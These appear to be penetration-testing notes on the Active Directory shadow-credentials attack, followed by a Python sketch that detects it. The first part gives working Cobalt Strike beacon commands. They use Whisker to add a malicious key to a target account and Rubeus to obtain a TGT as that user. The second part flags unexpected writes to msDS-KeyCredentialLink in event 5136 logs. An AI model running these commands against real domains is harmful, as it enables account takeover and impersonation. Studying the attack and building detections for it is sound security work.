When an account has shadow credentials configured, a client can obtain a TGT using these credentials (a key). In other words, an attacker with enough privileges to modify a target account's DACL to add a shadow credential can obtain a TGT as that user.
The attack relies on the tool Whisker.
1. Take note of any existing keys on the target account.
2. Add a malicious key to the target account.
3. Use the key to obtain a TGT.
4. Remove only the malicious key from the target after use.
```
# list existing keys
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[account]
# add malicious key (record base64-encoded certificate, its encryption password, and deviceid)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:[target-account]
# get TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-account] /certificate:[cert-base64] /password:"[cert-password]" /nowrap
# remove added key (alternatively use `clear` to remove all keys)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:[target-account] /deviceid:[key-deviceid]
```
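The add-then-remove sequence above leaves a trace in directory change auditing. The following detection sketch is an added example, not part of the original notes or of Whisker: it flags writes to `msDS-KeyCredentialLink` (the attribute that stores these keys) by unexpected subjects. It assumes Security event 5136 is being collected with a SACL covering that attribute and that events arrive as dictionaries; all account names, the allowlist and the one-hour window are constructed assumptions.

```python
from datetime import datetime, timedelta

ATTR = "msDS-KeyCredentialLink"
ADDED, DELETED = "%%14674", "%%14675"  # 5136 OperationType: value added / value deleted

def _ev(time, subject, target, op, attr=ATTR):
    return {"EventID": 5136, "Time": time, "SubjectUserName": subject,
            "ObjectDN": f"CN={target},OU=Accounts,DC=corp,DC=example",
            "AttributeLDAPDisplayName": attr, "OperationType": op}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    _ev("2024-05-01T09:00:00", "MSOL_sync", "alice", ADDED),    # allowlisted writer
    _ev("2024-05-01T10:00:00", "jsmith", "svc_sql", ADDED),     # unexpected writer
    _ev("2024-05-01T10:00:05", "jsmith", "svc_sql", ADDED, attr="description"),
    _ev("2024-05-01T10:07:30", "jsmith", "svc_sql", DELETED),   # key removed again
    _ev("2024-05-01T11:00:00", "bwayne", "dc01$", ADDED),       # key left in place
]

def find_key_writes(events, allowed_writers, window=timedelta(hours=1)):
    """Return one finding per key value added by a non-allowlisted subject."""
    hits = [e for e in events
            if e["EventID"] == 5136
            and e["AttributeLDAPDisplayName"].lower() == ATTR.lower()
            and e["SubjectUserName"].lower() not in allowed_writers]
    hits.sort(key=lambda e: e["Time"])  # ISO 8601 strings sort chronologically
    findings = []
    for add in (e for e in hits if e["OperationType"] == ADDED):
        t_add = datetime.fromisoformat(add["Time"])
        removed_after = None
        for e in hits:
            # Same subject deleting a value on the same object shortly after the add.
            if (e["OperationType"] == DELETED and e["ObjectDN"] == add["ObjectDN"]
                    and e["SubjectUserName"] == add["SubjectUserName"]):
                delta = datetime.fromisoformat(e["Time"]) - t_add
                if timedelta(0) <= delta <= window:
                    removed_after = delta
                    break
        findings.append({"object": add["ObjectDN"], "subject": add["SubjectUserName"],
                         "added": add["Time"], "removed_after": removed_after,
                         "severity": "high" if removed_after is not None else "medium"})
    return findings

if __name__ == "__main__":
    for finding in find_key_writes(SAMPLE_EVENTS, allowed_writers={"msol_sync"}):
        print(finding)
```

Findings are most useful when correlated with certificate-based (PKINIT) TGT requests for the same account in the same time frame.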